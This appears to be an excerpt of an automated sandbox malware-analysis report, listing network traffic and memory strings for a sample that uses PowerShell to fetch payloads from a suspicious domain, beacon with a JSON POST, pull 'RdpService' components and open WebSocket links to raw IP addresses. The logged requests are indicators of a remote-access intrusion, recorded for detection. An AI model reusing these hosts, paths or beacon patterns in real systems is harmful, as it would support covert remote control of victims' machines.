        Source: global trafficHTTP traffic detected: GET /file2/c57c20654b4343be4907fbac7f1262d6a79cc73fd2886dcfe5fc8312754be0cde2b1d9df4d61425f4f3265d2ed6dd59d98ea5986f45ac87d0d6d6cc34b8132c20d03c81e994427de6fa0a00d9dad087cf427cb41294857e34f691ad6220a02daeda5b2881e8d53cf9b2b7b5bffebebda HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: GET /file2/71d9165f3c9a29b4f9fd666440a5628d7bdaea493d607cf1c194857c9e9509ea85a7865658ff32ffa28c43f34e9f7b5c99dc12e70151602607e49269e25e548ff56b345bf7f9f9aafc5e37381b67bdcf26a917cd5c806adb42ab90c71b564ba17f10abcf18115f342c6e1065c1e853af HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: GET /file2/bf3e3406944bdd6271588a2c863024f40dd9933ab9ffdddddfc3c4688b888a33b543072600841d338722d8be39e0fbed7d8f360f490a597da48fdbe0b3c26e45bedad6338962586c553b7cf7f7fc173c2a7dc525b9d1b673338dc56e13d8e74d8544e3a61b2c33131f73315a439626d3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /file2/0e2b542dde5230d991123cf170512b0225ae8c373d66c8038f016679055f4d5229f8d5ac1df1afd229806593a24a07475c330ced357e5b62ca14794fc90cf9b5b18130bb75e02c6ba1e793807fb6a969dd58fac8a5f2f62a9469dc681627f3d76f41fb2548f810a2297e414d6c9ab966 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.3.20269 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
        Source: global trafficHTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec46908bbc655365f1557b986a778660e2192b4caaca811f3fa61268d807a76d0dd5d4112cfa6ad3e7314c91843f2cea3c900100c4cf95939e2af05452bbe95d756961d6e14e2026cebcf6a859fdcef1cd21d HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: GET /StaticFile/RdpService/64 HTTP/1.1Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: GET /StaticFile/TermServiceTryRun/59 HTTP/1.1Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: GET /api/check HTTP/1.1Host: uyt1n8ded9fb380.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: 7FFbF1a9LE6s2rh/7oiJ1A==Sec-WebSocket-Version: 13
        Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 206.206.126.252:8008Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: Gp+0/Cu8Ek6hn/4v2BFh5g==Sec-WebSocket-Version: 13
        Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: C0g8OClejEe5E7Qdk4mqPg==Sec-WebSocket-Version: 13
        Source: global trafficDNS traffic detected: DNS query: uyt1n8ded9fb380.com
        Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
        Source: unknownHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180e76bad689e35a3c9c5c0db73ce703e8 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 308
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateUpgrade: websocketContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AvSi%2BtyPnt5RK6IJo2SE7P30PruDiRYCrq7cLFyHbf6MyVnqHUQwjUoW%2BqMQ2Udw9kqKgq3pLTaWAMG2v0DW8OMJrYt3uuXaiJop4%2Fd5PjQYBk8mKae1jRDtE0AUrhn5tDkCnwTqXjb5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}CF-RAY: 8df4c8c6ae8c3720-FRAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=8437&sent=866&recv=327&lost=0&retrans=0&sent_bytes=763595&recv_bytes=41353&delivery_rate=1859534&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"X-Powered-By: ARR/3.0Date: Fri, 08 Nov 2024 10:12:22 GMTContent-Length: 4852Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margi
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateUpgrade: websocketContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Us5WuAXnEnokjlAe6p34%2BS6SrooJt%2FN%2B5RY6KklpqIyS77hbukeS4zQypuOXwI727saW2Ixji0SS7R4RPQoQTj4Sf6TFFd6nRoyY94YF9PAEHmoqUlfcN3gwLtJqjZC6kkF05eMTextA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}CF-RAY: 8df4c8da4eefa053-SINalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4915&sent=787&recv=534&lost=0&retrans=1&sent_bytes=633774&recv_bytes=74666&delivery_rate=8302193&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"X-Powered-By: ARR/3.0Date: Fri, 08 Nov 2024 10:12:25 GMTContent-Length: 4852Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{marg
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateUpgrade: websocketContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BbFNIDSw%2FOhNbordaH1JngoWKM3T6m0qynYQM0FO4Ogfm6ZgE1tEsoB2pNYy8XzOmd7KURCN%2F0WAWeZUWG0gnD%2FEbZqaIAQsRHA%2FhIzuWxdIc79rySMki7glPS7I47voYROJwbY%2FjvMF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}CF-RAY: 8df4c928c8962a08-CDGalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=24249&sent=3201&recv=1243&lost=0&retrans=0&sent_bytes=2856030&recv_bytes=153722&delivery_rate=664197&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"X-Powered-By: ARR/3.0Date: Fri, 08 Nov 2024 10:12:38 GMTContent-Length: 4852Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} p
        Source: powershell.exe, 0000000A.00000002.3709676539.000002AE5EE7C000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4161635712.000001ABAC346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704DBA000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://.css
        Source: powershell.exe, 0000000A.00000002.3709676539.000002AE5EE7C000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4161635712.000001ABAC346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704DBA000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://.jpg
        Source: powershell.exe, 00000002.00000002.3144151024.0000013EF2031000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3006009712.0000028370AF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3773331022.000002AE66639000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4165605923.000001EC3EF45000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3666889772.000001BA6B496000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3676533188.00000252E7D34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: powershell.exe, 00000002.00000002.3144151024.0000013EF2031000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3003756486.000002836E988000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3773331022.000002AE6661A000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4165605923.000001EC3EF45000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3666889772.000001BA6B496000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3676533188.00000252E7D34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: powershell.exe, 0000000A.00000002.3773331022.000002AE66639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.glohc
        Source: powershell.exe, 0000000A.00000002.3709676539.000002AE5EE7C000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4161635712.000001ABAC346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704DBA000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://html4/loose.dtd
        Source: svczHost.exe, 00000011.00000002.4159812586.000001ABA7F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.coj
        Source: powershell.exe, 00000002.00000002.3137956303.0000013EEA1CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3137956303.0000013EEA037000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3001836184.0000028310078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3339933418.000001BA014F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3607142957.000001BA101BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3607142957.000001BA10079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000002.00000002.3084642389.0000013EDA1EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3339933418.000001BA0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF73B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.3084642389.0000013EDA1EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3339933418.000001BA0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF73B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz-
        Source: powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4E993000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF73B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: svczHost.exe, svczHost.exe, 00000011.00000002.4166728095.00007FF704B2F000.00000004.00000001.01000000.00000009.sdmp, myRdpService.exeString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
        Source: powershell.exe, 0000000A.00000002.3709676539.000002AE5EE7C000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4161635712.000001ABAC346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704DBA000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
        Source: powershell.exe, 00000002.00000002.3084642389.0000013ED9FC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2992412595.0000028300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3709676539.000002AE5EE7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4E5D1000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000011.00000002.4161635712.000001ABAC346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704DBA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4166728095.00007FF704B2F000.00000004.00000001.01000000.00000009.sdmp, powershell.exe, 00000015.00000002.3339933418.000001BA00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF511000.00000004.00000800.00020000.00000000.sdmp, myRdpService.exeString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4E993000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF73B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 00000002.00000002.3084642389.0000013EDC2F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4FD60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uyt1n8ded9fb380.com
        Source: svczHost.exe, 00000011.00000002.4160642820.000001ABAB0A8000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4160642820.000001ABAB0B3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://uyt1n8ded9fb380.com:443/x
        Source: powershell.exe, 00000002.00000002.3084642389.0000013EDA1EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3339933418.000001BA0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF73B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000002.00000002.3084642389.0000013EDA1EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3339933418.000001BA0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF73B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz-
        Source: myRdpService.exeString found in binary or memory: http://www.gstatic.com/generate_204
        Source: svczHost.exe, 00000011.00000002.4161635712.000001ABAC346000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204y
        Source: svczHost.exe, 00000011.00000002.4159812586.000001ABA7F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
        Source: powershell.exe, 0000000A.00000002.3709676539.000002AE5EE7C000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000011.00000002.4161635712.000001ABAC346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704DBA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4166728095.00007FF704B2F000.00000004.00000001.01000000.00000009.sdmp, myRdpService.exeString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
        Source: powershell.exe, 0000000A.00000002.3709676539.000002AE5E675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3709676539.000002AE5EE7C000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000011.00000002.4161635712.000001ABAC346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4167022853.00007FF704CA1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704DBA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4161635712.000001ABABA48000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4166728095.00007FF704B2F000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704CA1000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, myRdpService.exe, 0000002A.00000000.3822806621.00007FF7C2EB8000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
        Source: svczHost.exe, myRdpService.exeString found in binary or memory: https://aka.ms/nativeaot-c
        Source: myRdpService.exeString found in binary or memory: https://aka.ms/nativeaot-compatibility
        Source: svczHost.exe, 00000011.00000000.3301026162.00007FF704DBA000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
        Source: powershell.exe, 0000000A.00000002.3709676539.000002AE5EE7C000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4161635712.000001ABAC346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704DBA000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
        Source: powershell.exe, 00000002.00000002.3084642389.0000013ED9FC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2992412595.0000028300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4E5D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3339933418.000001BA00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000006.00000002.3006930212.0000028370C10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4F1CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF73B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
        Source: powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4F1CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF73B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpXz-
        Source: powershell.exe, 00000015.00000002.3607142957.000001BA10079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000015.00000002.3607142957.000001BA10079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000015.00000002.3607142957.000001BA10079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: svczHost.exe, 00000011.00000002.4161635712.000001ABABA48000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002A.00000000.3822806621.00007FF7C2EB8000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/MartinKuschnik/WmiLight
        Source: powershell.exe, 00000002.00000002.3084642389.0000013EDA1EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3339933418.000001BA0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF73B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
